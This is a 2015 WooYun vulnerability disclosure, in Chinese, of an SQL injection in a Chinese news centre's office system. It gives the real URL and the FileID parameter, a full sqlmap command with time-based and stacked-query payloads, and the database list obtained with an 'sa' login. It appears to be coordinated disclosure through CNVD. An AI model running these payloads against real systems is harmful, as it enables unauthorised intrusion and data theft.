当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125775

漏洞标题:中国互联网新闻中心办公系统存在SQL注入

相关厂商:中国网

漏洞作者: 路人甲

提交时间:2015-07-10 18:42

修复时间:2015-08-28 14:36

公开时间:2015-08-28 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

中国互联网新闻中心办公系统存在SQL注入

详细说明:

中国互联网新闻中心办公系统,该系统存在SQL注入漏洞。
地址:http://oa.china-online.com.cn
注入地址:http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123
python sqlmap.py -u "http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123" --dbms "mssql" --tamper "space2comment.py" --dbs

Place: GET
Parameter: FileID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: FileID=123'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: FileID=123' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] [model)]
[*] [ReportServer!]
[*] C6
[*] master
[*] msdb
[*] ReportServerTympDB
[*] tempdb
current user: 'sa'


好了,点到为止,里面数据量巨大,就没有在深入了

漏洞证明:

中国互联网新闻中心办公系统,该系统存在SQL注入漏洞。
地址:http://oa.china-online.com.cn
注入地址:http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123
python sqlmap.py -u "http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123" --dbms "mssql" --tamper "space2comment.py" --dbs

Place: GET
Parameter: FileID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: FileID=123'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: FileID=123' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] [model)]
[*] [ReportServer!]
[*] C6
[*] master
[*] msdb
[*] ReportServerTympDB
[*] tempdb
current user: 'sa'


好了,点到为止,里面数据量巨大,就没有在深入了

修复方案:

过滤咯!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-14 14:36

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT发给中国网,由其后续协调网站管理单位处置。

最新状态:

暂无